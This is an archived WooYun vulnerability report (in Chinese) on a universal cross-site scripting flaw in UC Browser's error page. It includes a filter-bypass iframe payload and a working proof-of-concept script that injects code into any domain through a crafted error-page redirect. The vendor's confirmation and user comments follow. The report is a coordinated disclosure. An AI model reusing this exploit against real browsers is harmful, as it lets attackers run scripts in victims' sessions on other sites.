UC浏览器某处设计缺陷导致跨域脚本漏洞可跨任何域

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093214

漏洞标题：UC浏览器某处设计缺陷导致跨域脚本漏洞可跨任何域

漏洞作者： Lyleaks

提交时间：2015-01-21 18:08

修复时间：2015-04-21 18:10

公开时间：2015-04-21 18:10

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-21：细节已通知厂商并且等待厂商处理中
2015-01-22：厂商已经确认，细节仅向厂商公开
2015-01-25：细节向第三方安全合作伙伴开放
2015-03-18：细节向核心白帽子及相关领域专家公开
2015-03-28：细节向普通白帽子公开
2015-04-07：细节向实习白帽子公开
2015-04-21：细节向公众公开

简要描述：

UC浏览器设计上存在一个安全缺陷，导致可以突破浏览器同源策略，跨域执行任意脚本。

详细说明：

UC浏览器出错页面对失败网址没有过滤，导致XSS。
测试的时候发现，UC浏览器会把javascript:xss_code替换成javascript:void(0),把<script>之间的
代码和onerror等事件的代码替换为空，不能调用外部的js等。最后发现可以用下面代码绕过。

<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;document.domain&rpar;&gt;" />

而要访问浏览器的出错页面，可以让浏览器跳转到

ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1; ;FailReason=1;ErrorCode=1;

所以只要访问带有xss代码的url，再让浏览器跳转到出错页面，就能在任意域执行xss代码。
以乌云官网为例，构造如下poc。

<a href=javascript:foo()>Test it!</a>
<script>
var w;
var t;
function foo(){
w = window.open("http://www.wooyun.org/#\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u0064\u006f\u0063\u003d\u0022\u0026\u006c\u0074\u003b\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u0026\u0065\u0071\u0075\u0061\u006c\u0073\u003b\u0078\u003a\u0078\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u0026\u0065\u0071\u0075\u0061\u006c\u0073\u003b\u0061\u006c\u0065\u0072\u0074\u0026\u006c\u0070\u0061\u0072\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0064\u006f\u006d\u0061\u0069\u006e\u0026\u0072\u0070\u0061\u0072\u003b\u0026\u0067\u0074\u003b\u0022\u0020\u002f\u003e");
t = setInterval('bar()',100);
}
function bar(){
if (w.location.href !== 'about:blank') {
w.location='ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1; ;FailReason=1;ErrorCode=1;';
clearInterval(t);
}
}
</script>

点击Test it！

在www.wooyun.org执行xss代码

测试版本

漏洞证明：

访问
http://utf7.ml/t/uc1.html
点击Test it！

修复方案：

修复XSS

版权声明：转载请注明来源 Lyleaks@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-01-22 14:38

厂商回复：

漏洞存在，已转给相关同学处理，非常感谢！

漏洞评价：

2015-01-21 18:39 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明，什么也没有留下)

赚点云币买树莓派 XD
2015-01-21 18:52 | 瘦蛟舞 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

http://utf7.ml/welcome.html
2015-01-21 18:54 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

PL
2015-01-21 22:21 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

.......
2015-01-30 18:42 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明，什么也没有留下)

@UC Mobile 礼物已收到，Thx

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093214

漏洞标题：UC浏览器某处设计缺陷导致跨域脚本漏洞可跨任何域

相关厂商：UC Mobile

漏洞作者： Lyleaks

提交时间：2015-01-21 18:08

修复时间：2015-04-21 18:10

公开时间：2015-04-21 18:10

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Lyleaks@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093214

漏洞标题：UC浏览器某处设计缺陷导致跨域脚本漏洞可跨任何域

相关厂商：UC Mobile

漏洞作者： Lyleaks

提交时间：2015-01-21 18:08

修复时间：2015-04-21 18:10

公开时间：2015-04-21 18:10

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-093214"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Lyleaks@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：